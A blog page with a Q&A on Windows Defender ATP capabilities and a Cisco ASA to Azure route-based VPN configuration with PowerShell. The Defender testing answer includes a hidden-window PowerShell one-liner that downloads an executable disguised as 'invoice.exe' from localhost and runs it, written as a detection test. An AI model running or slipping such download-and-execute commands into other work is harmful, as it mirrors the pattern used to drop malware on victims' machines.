SharePoint Stuff



Windows Defender Advanced Threat Protection (WDATP) Q&A

Written by Luke Smith. Posted in Microsoft

Q:Can you configure Defender ATP to use additional or different security threat feeds such as: FireEye, LookingGlass, Infoblox, SecureWorks, RSA, McAfee, Customer prebuilt feed)
A: TBC
Q: Are you able to block particular MD5\applications
A: You can create custom IOC’s and TI;s using API or PS (https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/threat-indicator-concepts-windows-defender-advanced-threat-protection)
Q Can you define automatic custom isolation and block rules (based on MD5 and application names)
A: TBC
Q: Can you Change the ratings of the existing threat categories?
A: Only for the custom Indicators of Compromise IOC’s or Threat Intelligence TI’s
Q:Can you Integrate with other SIEMs\SOCs
A: Currently only HP and splunk
Q: Can Defender ATP Integrate with third-party CMDBs
A: AD using AD connect – TBc for third-parties such as SCCM\LANDesk
Q: Can Windows Defender ATP integrate with Office ATP
A: Yes, WDATP and O365ATP can be integrated and needs enabling as per the following: https://support.office.com/en-us/article/Office-365-Threat-Intelligence-overview-32405DA5-BEE1-4A4B-82E5-8399DF94C512 and https://docs.microsoft.com/en-gb/windows/threat-protection/windows-defender-atp/advanced-features-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with older versions of Windows below 8.1?
A: No, but does work with Windows Server 2012R2 and above https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/configure-server-endpoints-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with non-windows based machines
A: Yes, requires Bitdefender and can run on macOS, Linux, iOS and Android: https://www.bitdefender.com/business/end-point-security-linux-mac.html (Other third-parties such as Lookout and Ziften will be added Nov 2017)
Q: Can Defender integrate with Cloud App Security?
A: TBC
Q: How can I test Defender ATP
A: see: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus:DOS/EICAR_Test_File – text file containing remove the <>
A: once configured and also run:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://127.0.0.1/1.exe’, ‘C:\test-WDATP-test\invoice.exe’);Start-Process ‘C:\test-WDATP-test\invoice.exe’

Useful Links:
Docs.Microsoft: https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/windows-defender-advanced-threat-protection
Windows Defender Advanced Threat Protection – Ransomware response playbook https://www.microsoft.com/en-us/download/confirmation.aspx?id=55090

CISCO ASA RouteBase IKE V2 configuration

Written by Luke Smith. Posted in Microsoft

As of June 2017 update to the CISCO IOS you can now establish RouteBased VPN’s into Azure using VTI and IKEv2

RouteBased Connection was previously known as Dynamic Routing.

Minimum IOS Version: 9.8(1) Released 15th May 2017 (https://software.cisco.com/download/release.html?mdfid=286285782&softwareid=280775065&release=9.8.1)
Recommended IOS Version in a HA configuration: 9.8(1.5) (known bug in previous versions) or 9.8(2) released August 2017

Example below will create an Azure VpnGw1 VPN using an IPSec Custom Policy with BGP enabled (on the Azure End)

Below is the config sample for the CISCO ASA:


crypto ikev2 policy 3
crypto ikev2 policy 3
encryption aes-256
integrity sha
group 2
prf sha
lifetime seconds 28000

crypto ipsec ikev2 ipsec-proposal PROP-AZURE-PRD
protocol esp encryption aes-256
protocol esp integrity sha-1

crypto ipsec profile PROF-AZURE-PRD
set ikev2 ipsec-proposal PROP-AZURE-PRD
set pfs group24
set security-association lifetime kilobytes 102400000
set security-association lifetime seconds 27000

interface Tunnel 1
nameif VPN-AZURE-PRD

ip address 10.255.255.1 255.255.255.0
tunnel source interface outside
tunnel destination "Azure VPN Public IP"
tunnel mode ipsec ipv4
tunnel protection ipsec profile PROF-AZURE-PRD

tunnel-group "Azure VPN Public IP" type ipsec-l2l
tunnel-group "Azure VPN Public IP" ipsec-attributes
ikev2 remote-authentication pre-shared-key xxxxxx
ikev2 local-authentication pre-shared-key xxxxxx

route VPN-AZURE-PRD "Azure Address Space IP" "Azure Address Space Subnet" "Azure VPN Public IP"
route VPN-AZURE-PRD 10.10.0.0 255.255.0.0 "Azure VPN Public IP"

Below is the powershell for an ARM based Azure VPN:

#based on https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-connect-multiple-policybased-rm-ps

Login-AzureRmAccount
Select-AzureRmSubscription -SubscriptionName "Your Subscription Name" #Update Accordingly
$VirtualNetworkName = "Your VNET Name" #Update Accordingly
$ResourceGroup = "Your Resource Group Name" #Update Accordingly
$Location = "UK South" #Update Accordingly
$LocalGatewayName = "HeadOfficeVPN" #Update Accordingly
$HeadOfficeVPNIP = "Local VPN Public IP" #Update Accordingly
$LocalAddressPrefix = @("172.16.0.0/24","172.17.0.0/23","10.255.255.0/24") #your local network ranges
$GatewayIpName = "Vnetgwpublicip1" #Update Accordingly
$GatewaySubnetName = "GatewaySubnet"
$GatewayIpConfigName = "Vnetgwconfig1" #Update Accordingly
$GatewayVPNType = "RouteBased" #Update Accordingly
$GatewaySKU = "VpnGw1" #Update Accordingly
$GatewayName = "VNetgw1" #Update Accordingly
$GatewayConnectionName = "VNetgw1toHeadOfficeVPN" #Update Accordingly
$PreSharedKey = "**************" #Your PreShared Key

#Create Local Network Gateway
New-AzureRmLocalNetworkGateway -Name $LocalGatewayname `
-Location "$location" -AddressPrefix $LocalAddressPrefix `
-GatewayIpAddress $HeadOfficeVPNIP -ResourceGroupName $ResourceGroup
#Create Public IP Address
$ipaddress = New-AzureRmPublicIpAddress -Name $GatewayIpName `
-ResourceGroupName $ResourceGroup -Location $location `
-AllocationMethod Dynamic

#Create Gateway IP addressing configuration
$subnet = Get-AzureRmVirtualNetworkSubnetConfig -Name $GatewaySubnetName -VirtualNetwork (Get-AzureRmVirtualNetwork -Name $VirtualNetworkName -ResourceGroupName $ResourceGroup)
$gwipconfig = New-AzureRmVirtualNetworkGatewayIpConfig -Name $GatewayIpConfigName -SubnetId $subnet.id -PublicIpAddressId $ipaddress.id

#Create the VPN gateway

New-AzureRmVirtualNetworkGateway -Name $GatewayName -ResourceGroupName $ResourceGroup -Location $location -GatewaySKU $GatewaySKU -GatewayType Vpn -IpConfigurations $gwipconfig -EnableBgp $true -VpnType $GatewayVPNType

#IPSec Custom Policy

$ipsecpolicy = New-AzureRmIpsecPolicy -IkeEncryption AES256 -IkeIntegrity SHA1 -DhGroup DHGroup2 -IpsecEncryption AES256 -IpsecIntegrity SHA1 -PfsGroup PFS24 -SALifeTimeSeconds 27000 -SADataSizeKilobytes 102400000

#Gateway Name

$vnet1gw = Get-AzureRmVirtualNetworkGateway -Name $GatewayName -ResourceGroupName $ResourceGroup
$LocalGatewayName1 = Get-AzureRmLocalNetworkGateway -Name $LocalGatewayName -ResourceGroupName $ResourceGroup

New-AzureRmVirtualNetworkGatewayConnection -Name $GatewayConnectionName -ResourceGroupName $ResourceGroup -VirtualNetworkGateway1 $vnet1gw -LocalNetworkGateway2 $LocalGatewayName1 -Location $Location -ConnectionType IPsec -UsePolicyBasedTrafficSelectors $True -IpsecPolicies $ipsecpolicy -SharedKey $PreSharedKey

#Get GatewayPublicIP

Get-azurermpublicipaddress -name $gatewayipname -resourcegroup $resourcegroup

#Get BGP Information
$vnet1gw = Get-AzureRmVirtualNetworkGateway -Name $gatewayname -ResourceGroupName $resourcegroup
$vnet1gw.BgpSettingsText

Good Luck